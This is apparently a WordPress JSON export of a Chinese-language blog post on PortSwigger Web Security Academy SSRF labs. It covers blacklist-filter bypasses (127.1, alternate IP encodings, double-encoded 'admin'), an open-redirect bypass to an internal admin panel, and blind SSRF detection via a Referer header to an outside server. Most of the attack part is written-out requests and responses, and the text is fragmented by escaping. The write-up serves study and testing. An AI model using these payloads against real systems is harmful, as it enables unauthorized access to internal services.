<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
SSRF\u653b\u64ca\u7684\u9632\u79a6\u63aa\u65bd\u5f88\u5e38\u898b\uff0c\u4f46\u5927\u90e8\u4efd\u53ef\u4ee5\u9952\u904e<\/p>\n\n\n\n
\u7576\u5b89\u5168\u9650\u5236\u5c01\u9396 <\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u6b63\u5e38\u8acb\u6c42\u5982\u4e0b\uff0c\u5df1\u77e5stockApi\u6709\u4e00\u500bSSRF\u5b89\u5168\u6f0f\u6d1e<\/p>\n\n\n\n \u56e0\u6b64\u53ef\u4ee5\u7528stockApi\u53bb\u5617\u8a66\u8a2a\u554f \u5617\u8a66\u628a127.0.0.1\u63db\u6210 admin\u53ef\u80fd\u88ab\u5b89\u5168\u6a5f\u5236\u7576\u505a\u654f\u611f\u8f38\u5165\u800c\u88ab\u9650\u5236\uff0c\u5617\u8a66\u5c07admin\u7684a\u7528double-URL encoding\u70ba lab: SSRF with blacklist-based input filter<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u5df1\u77e5stockApi\u6709SSRF\u5b89\u5168\u6f0f\u6d1e\uff0c\u5617\u8a66\u8a2a\u554f\u7ba1\u7406\u4ecb\u9762\u88ab\u5b89\u5168\u6a5f\u5236\u963b\u6b62<\/p>\n\n\n\n \u800c\u8a72\u76ee\u6a19\u6709\u500b\u8acb\u6c42\u53ef\u4ee5\u505a\u91cd\u5c0e\u5411\uff0c\u900f\u904epath\u53c3\u6578\u53ef\u4ee5\u91cd\u5c0e\u5411\u6307\u5b9a\u7684\u4f4d\u7f6e<\/p>\n\n\n\n \u5c07path\u53c3\u6578\u6539\u70ba\u7ba1\u7406\u754c\u9762\uff0c\u5229\u7528\u91cd\u5c0e\u5411\u7684\u65b9\u5f0f\u627a\u9054\u7ba1\u7406\u754c\u9762<\/p>\n\n\n\n \u5c07\u91cd\u5c0e\u5411\u529f\u80fd\u7684\u7db2\u5740\u9935\u7d66stockApi\uff0c\u5617\u8a66\u5229\u7528\u91cd\u5c0e\u5411\u9952\u904e\u5b89\u5168\u6a5f\u5236\uff0c\u4f46\u51fa\u73fe\u907a\u5931\u53c3\u6578\u8a0a\u606f<\/p>\n\n\n\n \u8abf\u6574\u8acb\u6c42\uff0c\u53ea\u4fdd\u7559path\u53c3\u6578\u5728\u505a\u6e2c\u8a66\uff0c\u53ef\u6210\u529f\u5229\u7528\u91cd\u5c0e\u5411\u9952\u904e\u5b89\u5168\u6a5f\u5236<\/p>\n\n\n\n lab: SSRF with filter bypass via open redirection vulnerability<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u5982\u679cSSRF\u8a2a\u554f\u7d50\u679c\u4e0d\u6703\u56de\u61c9\u5728\u524d\u7aef\uff0c\u53ef\u4ee5\u900f\u904e\u8a2a\u554f\u5916\u7db2\u4f86\u78ba\u8a8d<\/p>\n\n\n\n \u5047\u5982\u61f7\u7591referer\u6709SSRF\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n \u5982\u679c\u6709SSRF\u554f\u984c\uff0c\u670d\u52d9\u5668 SSRF\u653b\u64ca\u7684\u9632\u79a6\u63aa\u65bd\u5f88\u5e38\u898b\uff0c\u4f46\u5927\u90e8\u4efd\u53ef\u4ee5\u9952\u904e \u7576\u5b89\u5168\u9650\u5236\u5c01 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[42],"class_list":["post-1224","post","type-post","status-publish","format-standard","hentry","category-serverside","tag-bypass"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1224","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1224"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1224\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1224"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1224"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1224"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}127.0.0.1<\/code>\u6216localhost<\/code>\u6216\u654f\u611fURL\u7684\u8f38\u5165\u6642\uff0c\u6709\u4ee5\u4e0b\u65b9\u5f0f\u53ef\u4ee5\u9952\u904e\uff1a<\/p>\n\n\n\n\n
127.0.0.1<\/code>\uff0c\u4f8b\u59822130706433<\/code>\u3001017700000001<\/code>\u6216127.1<\/code>\u3002<\/li>\n\n\n\n127.0.0.1<\/code>\u3002<\/li>\n\n\n\nhttp:<\/code>\u5230https:<\/code>\u5207\u63db\u53ef\u4ee5\u7e5e\u904e\u67d0\u4e9bSSRF\u904e\u6ffe\u5668\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n\u9952\u904e\u9ed1\u540d\u55ae\u904e\u6ffe<\/h2>\n\n\n\n
POST \/product\/stock HTTP\/1.1\n...omit...\nstockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1<\/code><\/pre>\n\n\n\nhttp:\/\/127.0.0.1\/admin<\/code> \uff0c\u4f46\u56e0\u70ba\u76ee\u6a19\u6709\u505a\u5b89\u5168\u9650\u5236\uff0c\u56e0\u6b64\u8fd4\u56de400<\/p>\n\n\n\n############ attack request ############ \nPOST \/product\/stock HTTP\/1.1\n...omit...\nstockApi=http:\/\/127.0.0.1\/admin \n \n############ attack response ############ \n400\n<\/code><\/pre>\n\n\n\n127.1<\/code>\u3002\u767c\u73fe\u4ecd\u7136\u88ab\u963b\u64cb\uff0c\u4f46\u8fd4\u56de\u8a0a\u606f\u8b8a\u6210500<\/p>\n\n\n\n############ attack request ############ \nPOST \/product\/stock HTTP\/1.1\n...omit...\nstockApi=http:\/\/127.1\/admin \n\n############ attack respone ############ \n500<\/code><\/pre>\n\n\n\n%2561<\/code>\uff0c\u767c\u73fe\u53ef\u4ee5\u6210\u529f\u8a2a\u554fadmin<\/p>\n\n\n\n############ attack request ############ \nPOST \/product\/stock HTTP\/1.1\n...omit...\nstockApi=http:\/\/127.1\/%2561dmin \n\n############ attack response ############ \n200\n...omit...\n <a href=\"\/\/192.168.0.12:8080\/admin\/delete?username=carlos\">Delete<\/a>\n...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\n\u5229\u7528\u91cd\u5b9a\u5411\u7e5e\u904e\u5b89\u5168\u6a5f\u5236<\/h2>\n\n\n\n
############ attack request ############ \n...omit...\nstockApi=http:\/\/192.168.0.12:8080\/admin\n\n############ attak response ############ \nHTTP\/1.1 400 Bad Request\nContent-Type: application\/json; charset=utf-8\nConnection: close\nContent-Length: 48\n\"Invalid external stock check url 'Invalid URL'\"<\/code><\/pre>\n\n\n\n############ request ############ \nGET \/product\/nextProduct?currentProductId=1&path=\/product?productId=2 HTTP\/1.1\n...omit...\n\n############ response ############ \nHTTP\/1.1 302 Found\nLocation: \/product?productId=2\nConnection: close\nContent-Length: 0<\/code><\/pre>\n\n\n\n############ attack request ############ \nGET \/product\/nextProduct?currentProductId=1&path=http:\/\/192.168.0.12:8080\/admin HTTP\/1.1\n...omit...\n\n############ attack response ############ \nHTTP\/1.1 302 Found\nLocation: http:\/\/192.168.0.12:8080\/admin\nConnection: close\nContent-Length: 0<\/code><\/pre>\n\n\n\n############ attack request ############ \n...omit...\nstockApi=\/product\/nextProduct?currentProductId=1&path=http:\/\/192.168.0.12:8080\/admin\n\n ############ attack response ############ \n\"Missing parameter 'path'\"<\/code><\/pre>\n\n\n\n############ attack request ############ \n...omit...\nstockApi=\/product\/nextProduct?path=http:\/\/192.168.0.12:8080\/admin\n\n############ attack response ############ \n...omit...\n<div>\n <span>administrator - <\/span>\n <a href=\"\/\/192.168.0.12:8080\/admin\/delete?username=administrator\">Delete<\/a>\n<\/div>\n<div>\n <span>wiener - <\/span>\n <a href=\"\/\/192.168.0.12:8080\/admin\/delete?username=wiener\">Delete<\/a>\n<\/div>\n...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\n\u76f2\u6ce8<\/h2>\n\n\n\n
\n
GET \/product?productId=13 HTTP\/1.1\r\nHost: ac761f9a1fa0ac4080340a960055008f.web-security-academy.net\r\n...omit...\r\nReferer: https:\/\/outside.webserver<\/mark>\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9\r\nCookie: session=mguSzHNei4uLoGhWwxNHydOXGFfirdD2<\/code><\/pre>\n\n\n\noutside.webserver<\/code>\u6703\u63a5\u6536\u5230dns\u8acb\u6c42<\/p>\n","protected":false},"excerpt":{"rendered":"